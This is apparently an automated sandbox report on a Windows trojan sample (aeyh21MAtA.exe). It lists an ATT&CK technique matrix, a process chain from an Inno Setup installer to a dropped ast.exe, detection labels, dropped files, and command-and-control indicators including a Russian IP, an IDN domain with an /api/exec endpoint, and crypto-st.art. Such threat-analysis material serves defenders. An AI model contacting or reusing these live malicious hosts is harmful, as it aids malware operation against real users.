                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E03575 sqlite3_bind_parameter_count
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E28543 sqlite3_bind_int64,sqlite3_mutex_leave
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E284DE sqlite3_bind_double,sqlite3_mutex_leave
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E284B7 sqlite3_bind_text16
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E2844A sqlite3_bind_text64
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E28423 sqlite3_bind_text
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E1672A sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E2873D sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E28656 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob
                          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                          Gather Victim Identity Information1
                          Scripting
                          Valid Accounts2
                          Windows Management Instrumentation
                          1
                          Scripting
                          1
                          DLL Side-Loading
                          1
                          Deobfuscate/Decode Files or Information
                          OS Credential Dumping1
                          System Time Discovery
                          Remote Services12
                          Archive Collected Data
                          1
                          Ingress Tool Transfer
                          Exfiltration Over Other Network Medium1
                          Data Encrypted for Impact
                          CredentialsDomainsDefault Accounts1
                          Native API
                          1
                          DLL Side-Loading
                          12
                          Process Injection
                          3
                          Obfuscated Files or Information
                          LSASS Memory1
                          Account Discovery
                          Remote Desktop ProtocolData from Removable Media21
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          Registry Run Keys / Startup Folder
                          1
                          Registry Run Keys / Startup Folder
                          1
                          Software Packing
                          Security Account Manager3
                          File and Directory Discovery
                          SMB/Windows Admin SharesData from Network Shared Drive1
                          Non-Standard Port
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          DLL Side-Loading
                          NTDS123
                          System Information Discovery
                          Distributed Component Object ModelInput Capture2
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Masquerading
                          LSA Secrets331
                          Security Software Discovery
                          SSHKeylogging3
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                          Virtualization/Sandbox Evasion
                          Cached Domain Credentials21
                          Virtualization/Sandbox Evasion
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                          Process Injection
                          DCSync3
                          Process Discovery
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                          Application Window Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow3
                          System Owner/User Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          [Behavior graph. ID: 1558736; Sample: aeyh21MAtA.exe; Startdate: 19/11/2024; Architecture: WINDOWS; Score: 88]
                          Process chain: aeyh21MAtA.exe -> aeyh21MAtA.tmp -> aeyh21MAtA.exe -> aeyh21MAtA.tmp -> cmd.exe -> xcopy.exe, ast.exe, conhost.exe
                          Network: ast.exe -> id.xn--80akicokc0aablc.xn--p1ai, 212.193.169.65, ports 443, 44335, 49977, SAFIB-ASRU, Russian Federation; ast.exe -> 127.0.0.1

                          Source | Detection | Scanner | Label | Link
                          aeyh21MAtA.exe | 37% | ReversingLabs | Win32.Trojan.Generic
                          aeyh21MAtA.exe | 100% | Avira | TR/Spy.Agent.epnkj
                          Source | Detection | Scanner | Label | Link
                          C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp | 2% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp | 2% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\AstCrp.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\ast.exe (copy) | 12% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\astclient.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\astrct.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\aw_sas32.dll (copy) | 4% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\hatls.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-0HK0N.tmp | 4% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-16KCC.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-5765H.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-5FFPK.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-60GLH.tmp | 4% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-AAPRN.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-BG0DN.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-E6DJ2.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-GPS00.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-MU1HO.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-S3CIC.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-SNDPS.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp | 12% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-VO31B.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\libcrypto-1_1.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\libcryptoMD.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\libcurl.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\libeay32.dll (copy) | 4% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\libjpeg-turbo-win.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\libssl-1_1.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\msvcr120.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\opus.dll (copy) | 0% | ReversingLabs
                          No Antivirus matches
                          No Antivirus matches
                          Name | IP | Active | Malicious | Antivirus Detection | Reputation
                          id.xn--80akicokc0aablc.xn--p1ai | 212.193.169.65 | true | false | | high
                          Name | Malicious | Antivirus Detection | Reputation
                          https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec | false | | high
                              NameSourceMaliciousAntivirus DetectionReputation
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://id.xn--80akicokc0aablc.xn--p1ai:44335i:443yast.exe, 0000000A.00000002.3344815019.000000000302B000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://id.xn--80akicokc0aablc.xn--p1ai:44335......ast.exe, 0000000A.00000002.3348750365.000000000337B000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://id.xn--80akicokc0aablc.xn--p1ai:443JVast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3275116176.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3222862221.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3097910899.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3087444966.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196167078.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3074037085.0000000005D76000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224020822.0000000005D99000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178707233.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3081842391.0000000005D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3363176686.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141347725.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3338883178.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D96000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://id.xn--80akicokc0aablc.xn--p1ai:443Uast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://id.xn--80akicokc0aablc.xn--p1ai:44335/ast.exe, 0000000A.00000003.3018890151.0000000005DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://curl.haxx.se/docs/http-cookies.html#ast.exefalse
                                          high
                                          https://datatracker.ietf.org/ipr/1526/ast.exe, 0000000A.00000000.2714237546.0000000000942000.00000002.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drfalse
                                            high
                                            https://id.xn--80akicokc0aablc.xn--p1ai:44335-ast.exe, 0000000A.00000002.3348750365.0000000003382000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3018890151.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.borland.com/namespaces/Typesteast.exe, 0000000A.00000002.3342382296.0000000000D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://id.xn--80akicokc0aablc.xn--p1ai:44ast.exe, 0000000A.00000003.3264857508.0000000005D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://id.xn--80akicokc0aablc.xn--p1ai:44396ast.exe, 0000000A.00000003.3196760907.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://id.xn--80akicokc0aablc.xn--p1aiCYast.exe, 0000000A.00000003.3020160381.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141994540.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://curl.haxx.se/docs/copyright.htmlDast.exe, 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp, is-VO31B.tmp.4.drfalse
                                                  high
                                                  https://id.xn--80akicokc0aablc.xn--p1ai:443Kast.exe, 0000000A.00000003.3196760907.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://crl.globalsign.ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://id.xn--80akicokc0aablc.xn--p1ai:443/Logast.exe, 0000000A.00000003.3141347725.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://id.xn--80akicokc0aablc.xn--p1ai:443/ast.exe, 0000000A.00000002.3342382296.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141347725.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3081992843.0000000005D83000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196167078.0000000005D83000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224328789.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://id.xn--80akicokc0aablc.xn--p1ai:443.ast.exe, 0000000A.00000003.3265913117.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3361561204.0000000005D4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://id.xn--80akicokc0aablc.xn--p1ai:443CBOsast.exe, 0000000A.00000003.2953188361.0000000005D7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://id.xn--80akicokc0aablc.xn--p1ai:4439ast.exe, 0000000A.00000003.3275116176.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://id.xn--80akicokc0aablc.xn--p1ai:4438ast.exe, 0000000A.00000003.3275116176.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178902749.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3097543299.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3087531277.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D6C000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2988161968.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141777377.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3340187350.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196760907.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3074429948.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 
0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224217384.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://id.xn--80akicokc0aablc.xn--p1ai443...ast.exe, 0000000A.00000002.3348750365.0000000003374000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443rVast.exe, 0000000A.00000003.2943724764.0000000005D7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.innosetup.com/aeyh21MAtA.exe, 00000000.00000003.2076621419.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.exe, 00000000.00000003.2076256080.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000000.2077569649.0000000000401000.00000020.00000001.01000000.00000004.sdmpfalse
                                                              high
                                                              https://id.xn--80akicokc0aablc.xn--p1ai:443iVfyast.exe, 0000000A.00000003.3030679576.0000000005D7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://id.xn--80akicokc0aablc.xn--p1ai:443uVast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://id.xn--80akicokc0aablc.xn--p1ai:443tsast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://id.xn--80akast.exe, 0000000A.00000003.3338883178.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://id.xn--80akicokc0aablc.xn--p1aivast.exe, 0000000A.00000002.3344406161.000000000116C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://id.xn--80akicokc0aablc.xn--p1aiis-TBGHD.tmp.4.drfalse
                                                                high
                                                                https://id.xn--80akicokc0aablc.xn--p1ai:443$ast.exe, 0000000A.00000003.3178902749.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://id.xn--80akicoast.exe, 0000000A.00000002.3344406161.000000000116C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://id.xn--80akicokc0aablc.xn--p1ai:443l~ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://id.xn--80akicokc0aablc.xn--p1ai:443uinast.exe, 0000000A.00000003.3288736833.0000000005D96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0saeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drfalse
                                                                  high
                                                                  http://www.borland.com/namespaces/Typeswast.exe, 0000000A.00000002.3342382296.0000000000D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://ocsp2.globalsign.ast.exe, 0000000A.00000003.3020160381.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/soap/encoding/ZZYast.exe, 0000000A.00000002.3342382296.0000000000D30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://id.xn--80akicokc0aablc.xn--p1ai:44335ast.exe, 0000000A.00000002.3344815019.000000000302B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://id.xn--80akicokc0aablc.xn--p1ai:443...43ast.exe, 0000000A.00000002.3344815019.0000000003023000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.kngstr.com/?PreDefines.ishaeyh21MAtA.exe, 00000000.00000003.2086829380.00000000021C2000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000003.2082226241.000000000237E000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.exe, 00000003.00000003.2454108378.00000000021A8000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000004.00000003.2445177272.00000000023CE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://id.xn--80akicokc0aablc.xn--p1ai:443/AstClnogast.exe, 0000000A.00000003.3081992843.0000000005D83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://id.xn--80akicokc0arast.exe, 0000000A.00000003.3318115880.0000000005D96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://id.xn--80akicokc0aablc.xn--p1ai:443:Vast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://id.xn--80akicokc0aablc.xn--p1aiIZast.exe, 0000000A.00000002.3342382296.0000000000E1D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224328789.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3266592381.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3276265728.0000000000E19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://datatracker.ietf.org/ipr/1524/ast.exe, 0000000A.00000000.2714237546.0000000000942000.00000002.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drfalse
                                                                          high
                                                                          https://id.xn--80akicokc0aablc.xn--p1aid003ast.exe, 0000000A.00000002.3344815019.0000000003064000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://id.xn--80akicokc0aablc.xn--p1ai:44335/templatepast.exe, 0000000A.00000003.3018890151.0000000005DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://id.xn--80akicokc0aablc.xn--p1aijast.exe, 0000000A.00000003.2783362504.0000000000E10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://crypto-st.art/update.phpast.exe, 0000000C.00000002.2942134917.0000000002BD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.borland.com/namespaces/Typesnuast.exe, 0000000B.00000002.2862003498.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://id.xn--80akicokc0aablc.xn--p1aiiast.exe, 0000000A.00000002.3344815019.0000000003032000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.openssl.org/)is-TBGHD.tmp.4.drfalse
                                                                              high
                                                                              https://id.xn--80akicokc0aablc.xn--p1ai:443VVast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://ocsp.sectigo.com0aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drfalse
                                                                                high
                                                                                http://www.openssl.org/Vaeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2449507358.00000000032AD000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://id.xn--80akicokc0aaast.exe, 0000000A.00000003.3224678358.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3124114421.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://schemas.xmlsoap.org/soap/encoding/rast.exe, 0000000C.00000002.2941388188.0000000000D48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drfalse
                                                                                      high
                                                                                      https://id.xn--80akicokc0aablc.xn--p1ai:443AUBast.exe, 0000000A.00000002.3356437009.0000000004418000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
IP | Domain | Country | ASN | ASN Name | Malicious
